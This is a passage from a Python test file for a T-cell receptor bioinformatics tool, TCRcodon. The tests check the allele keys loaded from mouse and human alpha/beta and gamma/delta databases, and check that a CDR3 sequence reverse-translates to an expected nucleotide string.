    """TCRcodon built from the mouse alpha/beta DB exposes exactly the expected allele keys."""
    tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
    # The full set of mouse TRA/TRB V, J and D alleles from alphabeta_db.tsv.
    assert set(tc.all_genes.keys()) == set(['TRAV1*01', 'TRAV1*02', 'TRAV10*01', 'TRAV10*02', 'TRAV10*03', 'TRAV10*04', 'TRAV10*05', 'TRAV10D*01', 'TRAV10D*02', 'TRAV10N*01', 'TRAV11*01', 'TRAV11*02', 'TRAV11D*01', 'TRAV11N*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-1*03', 'TRAV12-1*04', 'TRAV12-1*05', 'TRAV12-2*01', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV12-3*03', 'TRAV12-3*04', 'TRAV12D-1*01', 'TRAV12D-1*02', 'TRAV12D-1*03', 'TRAV12D-1*04', 'TRAV12D-1*05', 'TRAV12D-2*01', 'TRAV12D-2*02', 'TRAV12D-2*03', 'TRAV12D-2*04', 'TRAV12D-2*05', 'TRAV12D-3*01', 'TRAV12D-3*02', 'TRAV12D-3*03', 'TRAV12N-1*01', 'TRAV12N-2*01', 'TRAV12N-3*01', 'TRAV13-1*01', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV13-3*01', 'TRAV13-3*02', 'TRAV13-4/DV7*01', 'TRAV13-4/DV7*02', 'TRAV13-4/DV7*03', 'TRAV13-5*01', 'TRAV13D-1*01', 'TRAV13D-1*02', 'TRAV13D-1*03', 'TRAV13D-2*01', 'TRAV13D-2*02', 'TRAV13D-3*01', 'TRAV13D-3*02', 'TRAV13D-4*01', 'TRAV13D-4*02', 'TRAV13D-4*03', 'TRAV13N-1*01', 'TRAV13N-2*01', 'TRAV13N-3*01', 'TRAV13N-4*01', 'TRAV14-1*01', 'TRAV14-1*02', 'TRAV14-1*03', 'TRAV14-2*01', 'TRAV14-2*02', 'TRAV14-2*03', 'TRAV14-3*01', 'TRAV14-3*02', 'TRAV14-3*03', 'TRAV14D-1*01', 'TRAV14D-1*02', 'TRAV14D-2*01', 'TRAV14D-2*02', 'TRAV14D-2*03', 'TRAV14D-3/DV8*01', 'TRAV14D-3/DV8*02', 'TRAV14D-3/DV8*03', 'TRAV14D-3/DV8*04', 'TRAV14D-3/DV8*05', 'TRAV14D-3/DV8*06', 'TRAV14D-3/DV8*07', 'TRAV14D-3/DV8*08', 'TRAV14N-1*01', 'TRAV14N-2*01', 'TRAV14N-3*01', 'TRAV15-1/DV6-1*01', 'TRAV15-1/DV6-1*02', 'TRAV15-2/DV6-2*01', 'TRAV15-2/DV6-2*02', 'TRAV15D-1/DV6D-1*01', 'TRAV15D-1/DV6D-1*02', 'TRAV15D-1/DV6D-1*03', 'TRAV15D-1/DV6D-1*04', 'TRAV15D-1/DV6D-1*05', 'TRAV15D-1/DV6D-1*06', 'TRAV15D-2/DV6D-2*01', 'TRAV15D-2/DV6D-2*02', 'TRAV15D-2/DV6D-2*03', 'TRAV15D-2/DV6D-2*04', 'TRAV15D-2/DV6D-2*05', 'TRAV15N-1*01', 'TRAV15N-2*01', 'TRAV16*01', 'TRAV16*02', 'TRAV16*03', 'TRAV16*04', 'TRAV16*05', 'TRAV16D/DV11*01', 'TRAV16D/DV11*02', 'TRAV16D/DV11*03', 'TRAV16N*01', 'TRAV17*01', 'TRAV17*02', 'TRAV18*01', 'TRAV19*01', 'TRAV19*03', 
        'TRAV2*01', 'TRAV20*01', 'TRAV20*02', 'TRAV21/DV12*01', 'TRAV21/DV12*02', 'TRAV3-1*01', 'TRAV3-1*02', 'TRAV3-3*01', 'TRAV3-4*01', 'TRAV3D-3*01', 'TRAV3D-3*02', 'TRAV3N-3*01', 'TRAV4-2*01', 'TRAV4-2*02', 'TRAV4-3*01', 'TRAV4-3*02', 'TRAV4-4/DV10*01', 'TRAV4D-2*01', 'TRAV4D-3*01', 'TRAV4D-3*02', 'TRAV4D-3*03', 'TRAV4D-3*04', 'TRAV4D-4*01', 'TRAV4D-4*02', 'TRAV4D-4*03', 'TRAV4D-4*04', 'TRAV4N-3*01', 'TRAV4N-4*01', 'TRAV5-1*01', 'TRAV5-2*01', 'TRAV5-4*01', 'TRAV5D-2*01', 'TRAV5D-4*01', 'TRAV5D-4*02', 'TRAV5D-4*03', 'TRAV5D-4*04', 'TRAV5D-4*05', 'TRAV5N-2*01', 'TRAV5N-4*01', 'TRAV6-1*01', 'TRAV6-1*02', 'TRAV6-2*01', 'TRAV6-2*02', 'TRAV6-2*03', 'TRAV6-3*01', 'TRAV6-3*02', 'TRAV6-4*01', 'TRAV6-4*02', 'TRAV6-4*03', 'TRAV6-5*01', 'TRAV6-5*02', 'TRAV6-5*03', 'TRAV6-5*04', 'TRAV6-6*01', 'TRAV6-6*02', 'TRAV6-6*03', 'TRAV6-7/DV9*01', 'TRAV6-7/DV9*02', 'TRAV6-7/DV9*03', 'TRAV6-7/DV9*04', 'TRAV6-7/DV9*06', 'TRAV6-7/DV9*07', 'TRAV6-7/DV9*08', 'TRAV6D-3*01', 'TRAV6D-3*02', 'TRAV6D-4*01', 'TRAV6D-5*01', 'TRAV6D-6*01', 'TRAV6D-6*02', 'TRAV6D-6*03', 'TRAV6D-6*04', 'TRAV6D-6*05', 'TRAV6D-7*01', 'TRAV6D-7*02', 'TRAV6D-7*03', 'TRAV6D-7*04', 'TRAV6N-5*01', 'TRAV6N-6*01', 'TRAV6N-7*01', 'TRAV7-1*01', 'TRAV7-2*01', 'TRAV7-2*02', 'TRAV7-3*01', 'TRAV7-3*02', 'TRAV7-3*03', 'TRAV7-3*04', 'TRAV7-4*01', 'TRAV7-4*02', 'TRAV7-5*01', 'TRAV7-5*02', 'TRAV7-5*03', 'TRAV7-6*01', 'TRAV7-6*02', 'TRAV7D-2*01', 'TRAV7D-2*02', 'TRAV7D-2*03', 'TRAV7D-3*01', 'TRAV7D-3*02', 'TRAV7D-4*01', 'TRAV7D-4*02', 'TRAV7D-4*03', 'TRAV7D-5*01', 'TRAV7D-6*01', 'TRAV7D-6*02', 'TRAV7N-4*01', 'TRAV7N-5*01', 'TRAV7N-6*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-1*03', 'TRAV8-2*01', 'TRAV8D-1*01', 'TRAV8D-1*02', 'TRAV8D-2*01', 'TRAV8D-2*02', 'TRAV8D-2*03', 'TRAV8N-2*01', 'TRAV9-1*01', 'TRAV9-1*02', 'TRAV9-2*01', 'TRAV9-3*01', 'TRAV9-3*02', 'TRAV9-3*03', 'TRAV9-4*01', 'TRAV9D-1*01', 'TRAV9D-1*02', 'TRAV9D-2*01', 'TRAV9D-2*02', 'TRAV9D-2*03', 'TRAV9D-3*01', 'TRAV9D-3*02', 'TRAV9D-4*01', 'TRAV9D-4*03', 'TRAV9D-4*04', 'TRAV9N-2*01', 
        'TRAV9N-3*01', 'TRAV9N-4*01', 'TRAJ11*01', 'TRAJ12*01', 'TRAJ13*01', 'TRAJ15*01', 'TRAJ16*01', 'TRAJ17*01', 'TRAJ18*01', 'TRAJ19*01', 'TRAJ2*01', 'TRAJ2*02', 'TRAJ20*01', 'TRAJ21*01', 'TRAJ21*02', 'TRAJ22*01', 'TRAJ23*01', 'TRAJ24*01', 'TRAJ25*01', 'TRAJ26*01', 'TRAJ27*01', 'TRAJ28*01', 'TRAJ29*01', 'TRAJ3*01', 'TRAJ30*01', 'TRAJ31*01', 'TRAJ31*02', 'TRAJ32*01', 'TRAJ32*02', 'TRAJ33*01', 'TRAJ34*01', 'TRAJ34*02', 'TRAJ35*01', 'TRAJ35*02', 'TRAJ36*01', 'TRAJ37*01', 'TRAJ38*01', 'TRAJ39*01', 'TRAJ4*01', 'TRAJ40*01', 'TRAJ41*01', 'TRAJ42*01', 'TRAJ42*02', 'TRAJ43*01', 'TRAJ43*02', 'TRAJ44*01', 'TRAJ45*01', 'TRAJ45*02', 'TRAJ46*01', 'TRAJ47*01', 'TRAJ48*01', 'TRAJ49*01', 'TRAJ5*01', 'TRAJ50*01', 'TRAJ52*01', 'TRAJ53*01', 'TRAJ54*01', 'TRAJ56*01', 'TRAJ57*01', 'TRAJ58*01', 'TRAJ59*01', 'TRAJ6*01', 'TRAJ60*01', 'TRAJ61*01', 'TRAJ7*01', 'TRAJ9*01', 'TRAJ9*02', 'TRBV1*01', 'TRBV1*02', 'TRBV10*01', 'TRBV12-1*01', 'TRBV12-1*02', 'TRBV12-2*01', 'TRBV12-2*02', 'TRBV13-1*01', 'TRBV13-1*02', 'TRBV13-2*01', 'TRBV13-2*02', 'TRBV13-2*03', 'TRBV13-2*04', 'TRBV13-2*05', 'TRBV13-3*01', 'TRBV14*01', 'TRBV15*01', 'TRBV16*01', 'TRBV16*02', 'TRBV16*03', 'TRBV16*04', 'TRBV17*01', 'TRBV19*01', 'TRBV19*02', 'TRBV19*03', 'TRBV2*01', 'TRBV20*01', 'TRBV20*02', 'TRBV21*01', 'TRBV23*01', 'TRBV24*01', 'TRBV24*02', 'TRBV24*03', 'TRBV24*04', 'TRBV26*01', 'TRBV26*02', 'TRBV29*01', 'TRBV29*02', 'TRBV3*01', 'TRBV3*02', 'TRBV30*01', 'TRBV31*01', 'TRBV31*02', 'TRBV4*01', 'TRBV4*02', 'TRBV5*01', 'TRBV5*02', 'TRBV5*03', 'TRBV5*04', 'TRBV5*05', 'TRBV8*01', 'TRBV9*01', 'TRBJ1-1*01', 'TRBJ1-1*02', 'TRBJ1-2*01', 'TRBJ1-3*01', 'TRBJ1-4*01', 'TRBJ1-4*02', 'TRBJ1-5*01', 'TRBJ1-5*02', 'TRBJ1-5*03', 'TRBJ1-6*01', 'TRBJ1-7*01', 'TRBJ2-1*01', 'TRBJ2-2*01', 'TRBJ2-3*01', 'TRBJ2-4*01', 'TRBJ2-5*01', 'TRBJ2-6*01', 'TRBJ2-7*01', 'TRBJ2-7*02', 'TRBD1*01', 'TRBD2*01'])
def test_TCRcodon_human_ab_init():
    """TCRcodon built from the human alpha/beta DB exposes exactly the expected allele keys."""
    tc = TCRcodon(organism = "human", db_file = "alphabeta_db.tsv")
    # The full set of human TRA/TRB V, J and D alleles from alphabeta_db.tsv.
    assert set(tc.all_genes.keys()) == set(['TRAV1-1*01', 'TRAV1-1*02', 'TRAV1-2*01', 'TRAV1-2*02', 'TRAV10*01', 'TRAV11*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-2*01', 'TRAV12-2*02', 'TRAV12-2*03', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV13-1*01', 'TRAV13-1*02', 'TRAV13-1*03', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV14/DV4*01', 'TRAV14/DV4*02', 'TRAV14/DV4*03', 'TRAV14/DV4*04', 'TRAV16*01', 'TRAV17*01', 'TRAV18*01', 'TRAV19*01', 'TRAV2*01', 'TRAV2*02', 'TRAV20*01', 'TRAV20*02', 'TRAV20*03', 'TRAV20*04', 'TRAV21*01', 'TRAV21*02', 'TRAV22*01', 'TRAV23/DV6*01', 'TRAV23/DV6*02', 'TRAV23/DV6*03', 'TRAV23/DV6*04', 'TRAV24*01', 'TRAV24*02', 'TRAV25*01', 'TRAV26-1*01', 'TRAV26-1*02', 'TRAV26-1*03', 'TRAV26-2*01', 'TRAV26-2*02', 'TRAV27*01', 'TRAV27*02', 'TRAV27*03', 'TRAV29/DV5*01', 'TRAV29/DV5*02', 'TRAV3*01', 'TRAV30*01', 'TRAV30*02', 'TRAV30*03', 'TRAV30*04', 'TRAV34*01', 'TRAV35*01', 'TRAV35*02', 'TRAV36/DV7*01', 'TRAV36/DV7*02', 'TRAV36/DV7*03', 'TRAV36/DV7*04', 'TRAV38-1*01', 'TRAV38-1*02', 'TRAV38-1*03', 'TRAV38-1*04', 'TRAV38-2/DV8*01', 'TRAV39*01', 'TRAV4*01', 'TRAV40*01', 'TRAV41*01', 'TRAV5*01', 'TRAV6*01', 'TRAV6*02', 'TRAV6*03', 'TRAV6*04', 'TRAV6*05', 'TRAV6*06', 'TRAV7*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-2*01', 'TRAV8-2*02', 'TRAV8-3*01', 'TRAV8-3*02', 'TRAV8-3*03', 'TRAV8-4*01', 'TRAV8-4*02', 'TRAV8-4*03', 'TRAV8-4*04', 'TRAV8-4*05', 'TRAV8-4*06', 'TRAV8-4*07', 'TRAV8-6*01', 'TRAV8-6*02', 'TRAV8-7*01', 'TRAV9-1*01', 'TRAV9-2*01', 'TRAV9-2*02', 'TRAV9-2*03', 'TRAV9-2*04', 'TRAJ1*01', 'TRAJ10*01', 'TRAJ11*01', 'TRAJ12*01', 'TRAJ13*01', 'TRAJ13*02', 'TRAJ14*01', 'TRAJ15*01', 'TRAJ15*02', 'TRAJ16*01', 'TRAJ17*01', 'TRAJ18*01', 'TRAJ19*01', 'TRAJ2*01', 'TRAJ20*01', 'TRAJ21*01', 'TRAJ22*01', 'TRAJ23*01', 'TRAJ23*02', 'TRAJ24*01', 'TRAJ24*02', 'TRAJ25*01', 'TRAJ26*01', 'TRAJ27*01', 'TRAJ28*01', 'TRAJ29*01', 'TRAJ3*01', 'TRAJ30*01', 'TRAJ31*01', 'TRAJ32*01', 'TRAJ32*02', 'TRAJ33*01', 'TRAJ34*01', 'TRAJ35*01', 'TRAJ36*01', 'TRAJ37*01', 'TRAJ37*02', 'TRAJ38*01', 
        'TRAJ39*01', 'TRAJ4*01', 'TRAJ40*01', 'TRAJ41*01', 'TRAJ42*01', 'TRAJ43*01', 'TRAJ44*01', 'TRAJ45*01', 'TRAJ46*01', 'TRAJ47*01', 'TRAJ47*02', 'TRAJ48*01', 'TRAJ49*01', 'TRAJ5*01', 'TRAJ50*01', 'TRAJ51*01', 'TRAJ52*01', 'TRAJ53*01', 'TRAJ54*01', 'TRAJ55*01', 'TRAJ56*01', 'TRAJ57*01', 'TRAJ58*01', 'TRAJ59*01', 'TRAJ6*01', 'TRAJ60*01', 'TRAJ61*01', 'TRAJ7*01', 'TRAJ8*01', 'TRAJ9*01', 'TRBV1*01', 'TRBV10-1*01', 'TRBV10-1*02', 'TRBV10-2*01', 'TRBV10-2*02', 'TRBV10-3*01', 'TRBV10-3*02', 'TRBV10-3*03', 'TRBV10-3*04', 'TRBV11-1*01', 'TRBV11-2*01', 'TRBV11-2*02', 'TRBV11-2*03', 'TRBV11-3*01', 'TRBV11-3*02', 'TRBV11-3*03', 'TRBV12-1*01', 'TRBV12-2*01', 'TRBV12-3*01', 'TRBV12-4*01', 'TRBV12-4*02', 'TRBV12-5*01', 'TRBV13*01', 'TRBV13*02', 'TRBV14*01', 'TRBV14*02', 'TRBV15*01', 'TRBV15*02', 'TRBV15*03', 'TRBV16*01', 'TRBV16*02', 'TRBV16*03', 'TRBV17*01', 'TRBV18*01', 'TRBV19*01', 'TRBV19*02', 'TRBV19*03', 'TRBV2*01', 'TRBV2*02', 'TRBV2*03', 'TRBV20-1*01', 'TRBV20-1*02', 'TRBV20-1*03', 'TRBV20-1*04', 'TRBV20-1*05', 'TRBV20-1*06', 'TRBV20-1*07', 'TRBV20/OR9-2*01', 'TRBV20/OR9-2*02', 'TRBV20/OR9-2*03', 'TRBV21-1*01', 'TRBV21/OR9-2*01', 'TRBV23-1*01', 'TRBV23/OR9-2*01', 'TRBV23/OR9-2*02', 'TRBV24-1*01', 'TRBV24/OR9-2*01', 'TRBV25-1*01', 'TRBV26*01', 'TRBV26/OR9-2*01', 'TRBV26/OR9-2*02', 'TRBV27*01', 'TRBV28*01', 'TRBV29-1*01', 'TRBV29-1*02', 'TRBV29-1*03', 'TRBV29/OR9-2*01', 'TRBV29/OR9-2*02', 'TRBV3-1*01', 'TRBV3-1*02', 'TRBV3-2*01', 'TRBV3-2*02', 'TRBV3-2*03', 'TRBV30*01', 'TRBV30*02', 'TRBV30*04', 'TRBV30*05', 'TRBV4-1*01', 'TRBV4-1*02', 'TRBV4-2*01', 'TRBV4-2*02', 'TRBV4-3*01', 'TRBV4-3*02', 'TRBV4-3*03', 'TRBV4-3*04', 'TRBV5-1*01', 'TRBV5-1*02', 'TRBV5-3*01', 'TRBV5-3*02', 'TRBV5-4*01', 'TRBV5-4*02', 'TRBV5-4*03', 'TRBV5-4*04', 'TRBV5-5*01', 'TRBV5-5*02', 'TRBV5-5*03', 'TRBV5-6*01', 'TRBV5-7*01', 'TRBV5-8*01', 'TRBV5-8*02', 'TRBV6-1*01', 'TRBV6-2*01', 'TRBV6-3*01', 'TRBV6-4*01', 'TRBV6-4*02', 'TRBV6-5*01', 'TRBV6-6*01', 'TRBV6-6*02', 'TRBV6-6*03', 'TRBV6-6*04', 'TRBV6-6*05', 
        'TRBV6-7*01', 'TRBV6-8*01', 'TRBV6-9*01', 'TRBV7-1*01', 'TRBV7-2*01', 'TRBV7-2*02', 'TRBV7-2*03', 'TRBV7-2*04', 'TRBV7-3*01', 'TRBV7-3*02', 'TRBV7-3*03', 'TRBV7-3*04', 'TRBV7-3*05', 'TRBV7-4*01', 'TRBV7-6*01', 'TRBV7-6*02', 'TRBV7-7*01', 'TRBV7-7*02', 'TRBV7-8*01', 'TRBV7-8*02', 'TRBV7-8*03', 'TRBV7-9*01', 'TRBV7-9*02', 'TRBV7-9*03', 'TRBV7-9*04', 'TRBV7-9*05', 'TRBV7-9*06', 'TRBV7-9*07', 'TRBV9*01', 'TRBV9*02', 'TRBV9*03', 'TRBJ1-1*01', 'TRBJ1-2*01', 'TRBJ1-3*01', 'TRBJ1-4*01', 'TRBJ1-5*01', 'TRBJ1-6*01', 'TRBJ1-6*02', 'TRBJ2-1*01', 'TRBJ2-2*01', 'TRBJ2-2P*01', 'TRBJ2-3*01', 'TRBJ2-4*01', 'TRBJ2-5*01', 'TRBJ2-6*01', 'TRBJ2-7*01', 'TRBJ2-7*02', 'TRBD1*01', 'TRBD2*01', 'TRBD2*02'])
def test_TCRcodon_mouse_gd_init():
    """TCRcodon built from the mouse gamma/delta DB exposes exactly the expected allele keys."""
    tc = TCRcodon(organism = "mouse", db_file = "gammadelta_db.tsv")
    # The gammadelta DB includes TRG/TRD alleles plus the TRA alleles
    # (the expected set below mirrors the file contents).
    assert set(tc.all_genes.keys()) == set(['TRGV1*01', 'TRGV1*02', 'TRGV1*03', 'TRGV1*04', 'TRGV1*05', 'TRGV1*06', 'TRGV1*07', 'TRGV1*08', 'TRGV2*01', 'TRGV2*02', 'TRGV2*03', 'TRGV2*04', 'TRGV2*05', 'TRGV3*01', 'TRGV3*02', 'TRGV3*03', 'TRGV4*01', 'TRGV4*02', 'TRGV4*03', 'TRGV4*04', 'TRGV4*05', 'TRGV5*01', 'TRGV6*01', 'TRGV6*02', 'TRGV6*03', 'TRGV6*04', 'TRGV7*01', 'TRGV7*02', 'TRGJ3*01', 'TRGJ2*01', 'TRGJ1*01', 'TRGJ4*01', 'TRAV1*01', 'TRAV1*02', 'TRAV10*01', 'TRAV10*02', 'TRAV10*03', 'TRAV10*04', 'TRAV10*05', 'TRAV10D*01', 'TRAV10D*02', 'TRAV10N*01', 'TRAV11*01', 'TRAV11*02', 'TRAV11D*01', 'TRAV11N*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-1*03', 'TRAV12-1*04', 'TRAV12-1*05', 'TRAV12-2*01', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV12-3*03', 'TRAV12-3*04', 'TRAV12D-1*01', 'TRAV12D-1*02', 'TRAV12D-1*04', 'TRAV12D-1*05', 'TRAV12D-2*01', 'TRAV12D-2*02', 'TRAV12D-2*03', 'TRAV12D-2*04', 'TRAV12D-2*05', 'TRAV12D-3*01', 'TRAV12D-3*02', 'TRAV12D-3*03', 'TRAV12N-1*01', 'TRAV12N-2*01', 'TRAV12N-3*01', 'TRAV13-1*01', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV13-3*01', 'TRAV13-3*02', 'TRAV13-4/DV7*01', 'TRAV13-4/DV7*02', 'TRAV13-4/DV7*03', 'TRAV13-5*01', 'TRAV13D-1*01', 'TRAV13D-1*02', 'TRAV13D-1*03', 'TRAV13D-2*01', 'TRAV13D-2*02', 'TRAV13D-3*01', 'TRAV13D-3*02', 'TRAV13D-4*01', 'TRAV13D-4*02', 'TRAV13D-4*03', 'TRAV13N-1*01', 'TRAV13N-2*01', 'TRAV13N-3*01', 'TRAV13N-4*01', 'TRAV14-1*01', 'TRAV14-1*02', 'TRAV14-1*03', 'TRAV14-2*01', 'TRAV14-2*02', 'TRAV14-2*03', 'TRAV14-3*01', 'TRAV14-3*02', 'TRAV14-3*03', 'TRAV14D-1*01', 'TRAV14D-1*02', 'TRAV14D-2*01', 'TRAV14D-2*02', 'TRAV14D-2*03', 'TRAV14D-3/DV8*01', 'TRAV14D-3/DV8*02', 'TRAV14D-3/DV8*03', 'TRAV14D-3/DV8*04', 'TRAV14D-3/DV8*05', 'TRAV14D-3/DV8*06', 'TRAV14D-3/DV8*07', 'TRAV14D-3/DV8*08', 'TRAV14N-1*01', 'TRAV14N-2*01', 'TRAV14N-3*01', 'TRAV15-1/DV6-1*01', 'TRAV15-1/DV6-1*02', 'TRAV15-2/DV6-2*01', 'TRAV15-2/DV6-2*02', 'TRAV15D-1/DV6D-1*01', 'TRAV15D-1/DV6D-1*02', 'TRAV15D-1/DV6D-1*03', 'TRAV15D-1/DV6D-1*04', 'TRAV15D-1/DV6D-1*05', 
        'TRAV15D-1/DV6D-1*06', 'TRAV15D-2/DV6D-2*01', 'TRAV15D-2/DV6D-2*02', 'TRAV15D-2/DV6D-2*03', 'TRAV15D-2/DV6D-2*04', 'TRAV15D-2/DV6D-2*05', 'TRAV15N-1*01', 'TRAV15N-2*01', 'TRAV16*01', 'TRAV16*02', 'TRAV16*03', 'TRAV16*04', 'TRAV16*05', 'TRAV16D/DV11*01', 'TRAV16D/DV11*02', 'TRAV16D/DV11*03', 'TRAV16N*01', 'TRAV17*01', 'TRAV17*02', 'TRAV18*01', 'TRAV19*01', 'TRAV19*03', 'TRAV2*01', 'TRAV20*01', 'TRAV20*02', 'TRAV21/DV12*01', 'TRAV21/DV12*02', 'TRAV3-1*01', 'TRAV3-1*02', 'TRAV3-3*01', 'TRAV3-4*01', 'TRAV3D-3*01', 'TRAV3D-3*02', 'TRAV3N-3*01', 'TRAV4-2*01', 'TRAV4-2*02', 'TRAV4-3*01', 'TRAV4-3*02', 'TRAV4-4/DV10*01', 'TRAV4D-2*01', 'TRAV4D-3*01', 'TRAV4D-3*02', 'TRAV4D-3*03', 'TRAV4D-3*04', 'TRAV4D-4*01', 'TRAV4D-4*02', 'TRAV4D-4*03', 'TRAV4D-4*04', 'TRAV4N-3*01', 'TRAV4N-4*01', 'TRAV5-1*01', 'TRAV5-2*01', 'TRAV5-4*01', 'TRAV5D-2*01', 'TRAV5D-4*01', 'TRAV5D-4*02', 'TRAV5D-4*03', 'TRAV5D-4*04', 'TRAV5D-4*05', 'TRAV5N-2*01', 'TRAV5N-4*01', 'TRAV6-1*01', 'TRAV6-1*02', 'TRAV6-2*01', 'TRAV6-2*02', 'TRAV6-2*03', 'TRAV6-3*01', 'TRAV6-3*02', 'TRAV6-4*01', 'TRAV6-4*02', 'TRAV6-4*03', 'TRAV6-5*01', 'TRAV6-5*02', 'TRAV6-5*03', 'TRAV6-5*04', 'TRAV6-6*01', 'TRAV6-6*02', 'TRAV6-6*03', 'TRAV6-7/DV9*01', 'TRAV6-7/DV9*02', 'TRAV6-7/DV9*03', 'TRAV6-7/DV9*04', 'TRAV6-7/DV9*06', 'TRAV6-7/DV9*07', 'TRAV6-7/DV9*08', 'TRAV6D-3*01', 'TRAV6D-3*02', 'TRAV6D-4*01', 'TRAV6D-5*01', 'TRAV6D-6*01', 'TRAV6D-6*02', 'TRAV6D-6*03', 'TRAV6D-6*04', 'TRAV6D-6*05', 'TRAV6D-7*01', 'TRAV6D-7*02', 'TRAV6D-7*03', 'TRAV6D-7*04', 'TRAV6N-5*01', 'TRAV6N-6*01', 'TRAV6N-7*01', 'TRAV7-1*01', 'TRAV7-2*01', 'TRAV7-2*02', 'TRAV7-3*01', 'TRAV7-3*02', 'TRAV7-3*03', 'TRAV7-3*04', 'TRAV7-4*01', 'TRAV7-4*02', 'TRAV7-5*01', 'TRAV7-5*02', 'TRAV7-5*03', 'TRAV7-6*01', 'TRAV7-6*02', 'TRAV7D-2*01', 'TRAV7D-2*02', 'TRAV7D-2*03', 'TRAV7D-3*01', 'TRAV7D-3*02', 'TRAV7D-4*01', 'TRAV7D-4*02', 'TRAV7D-4*03', 'TRAV7D-5*01', 'TRAV7D-6*01', 'TRAV7D-6*02', 'TRAV7N-4*01', 'TRAV7N-5*01', 'TRAV7N-6*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-1*03', 
        'TRAV8-2*01', 'TRAV8D-1*01', 'TRAV8D-1*02', 'TRAV8D-2*01', 'TRAV8D-2*02', 'TRAV8D-2*03', 'TRAV8N-2*01', 'TRAV9-1*01', 'TRAV9-1*02', 'TRAV9-2*01', 'TRAV9-3*01', 'TRAV9-3*02', 'TRAV9-3*03', 'TRAV9-4*01', 'TRAV9D-1*01', 'TRAV9D-1*02', 'TRAV9D-2*01', 'TRAV9D-2*02', 'TRAV9D-2*03', 'TRAV9D-3*01', 'TRAV9D-3*02', 'TRAV9D-4*01', 'TRAV9D-4*03', 'TRAV9D-4*04', 'TRAV9N-2*01', 'TRAV9N-3*01', 'TRAV9N-4*01', 'TRDV1*01', 'TRDV2-1*01', 'TRDV2-2*01', 'TRDV2-2*02', 'TRDV4*01', 'TRDV5*01', 'TRDV5*02', 'TRDV5*03', 'TRDV5*04', 'TRDJ1*01', 'TRDJ2*01', 'TRDJ2*02', 'TRDD1*01', 'TRDD2*01'])
def test_TCRcodon_human_gd_init():
    """TCRcodon built from the human gamma/delta DB exposes exactly the expected allele keys."""
    tc = TCRcodon(organism = "human", db_file = "gammadelta_db.tsv")
    # The gammadelta DB includes TRG/TRD alleles plus the TRA alleles
    # (the expected set below mirrors the file contents).
    assert set(tc.all_genes.keys()) == set(['TRGV1*01', 'TRGV10*01', 'TRGV10*02', 'TRGV11*01', 'TRGV11*02', 'TRGV2*01', 'TRGV2*02', 'TRGV3*01', 'TRGV3*02', 'TRGV4*01', 'TRGV4*02', 'TRGV5*01', 'TRGV5P*01', 'TRGV5P*02', 'TRGV8*01', 'TRGV9*01', 'TRGV9*02', 'TRGVA*01', 'TRGJ1*01', 'TRGJ1*02', 'TRGJP1*01', 'TRGJ2*01', 'TRGJP*01', 'TRGJP2*01', 'TRAV1-1*01', 'TRAV1-1*02', 'TRAV1-2*01', 'TRAV1-2*02', 'TRAV10*01', 'TRAV11*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-2*01', 'TRAV12-2*02', 'TRAV12-2*03', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV13-1*01', 'TRAV13-1*02', 'TRAV13-1*03', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV14/DV4*01', 'TRAV14/DV4*02', 'TRAV14/DV4*03', 'TRAV14/DV4*04', 'TRAV16*01', 'TRAV17*01', 'TRAV18*01', 'TRAV19*01', 'TRAV2*01', 'TRAV2*02', 'TRAV20*01', 'TRAV20*02', 'TRAV20*03', 'TRAV20*04', 'TRAV21*01', 'TRAV21*02', 'TRAV22*01', 'TRAV23/DV6*01', 'TRAV23/DV6*02', 'TRAV23/DV6*03', 'TRAV23/DV6*04', 'TRAV24*01', 'TRAV24*02', 'TRAV25*01', 'TRAV26-1*01', 'TRAV26-1*02', 'TRAV26-1*03', 'TRAV26-2*01', 'TRAV26-2*02', 'TRAV27*01', 'TRAV27*02', 'TRAV27*03', 'TRAV29/DV5*01', 'TRAV29/DV5*02', 'TRAV3*01', 'TRAV30*01', 'TRAV30*02', 'TRAV30*03', 'TRAV30*04', 'TRAV34*01', 'TRAV35*01', 'TRAV35*02', 'TRAV36/DV7*01', 'TRAV36/DV7*02', 'TRAV36/DV7*03', 'TRAV36/DV7*04', 'TRAV38-1*01', 'TRAV38-1*02', 'TRAV38-1*03', 'TRAV38-1*04', 'TRAV38-2/DV8*01', 'TRAV39*01', 'TRAV4*01', 'TRAV40*01', 'TRAV41*01', 'TRAV5*01', 'TRAV6*01', 'TRAV6*02', 'TRAV6*03', 'TRAV6*04', 'TRAV6*05', 'TRAV6*06', 'TRAV7*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-2*01', 'TRAV8-2*02', 'TRAV8-3*01', 'TRAV8-3*02', 'TRAV8-3*03', 'TRAV8-4*01', 'TRAV8-4*02', 'TRAV8-4*03', 'TRAV8-4*04', 'TRAV8-4*05', 'TRAV8-4*06', 'TRAV8-4*07', 'TRAV8-6*01', 'TRAV8-6*02', 'TRAV8-7*01', 'TRAV9-1*01', 'TRAV9-2*01', 'TRAV9-2*02', 'TRAV9-2*03', 'TRAV9-2*04', 'TRDV1*01', 'TRDV2*01', 'TRDV2*02', 'TRDV2*03', 'TRDV3*01', 'TRDV3*02', 'TRDJ1*01', 'TRDJ4*01', 'TRDJ3*01', 'TRDJ2*01', 'TRDD1*01', 'TRDD3*01', 'TRDD2*01'])
def test_TCRcodon_single_example():
    """A single mouse beta-chain CDR3 reverse-translates to the expected nucleotide string."""
    codon_model = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
    nucseq = codon_model.guess_reverse_translation(
        v_gene_name='TRBV29*01',
        j_gene_name='TRBJ1-5*01',
        cdr3_aa='CASSEGEAPLF')
    assert nucseq == 'TGTGCTAGCAGTGAGGGAGAGGCTCCGCTTTTT'
def test_TCRcodon_single_example2():
    """Reverse translation matches the real sequence at both CDR3 edges.

    Only the V- and J-derived edges are guaranteed to match the real
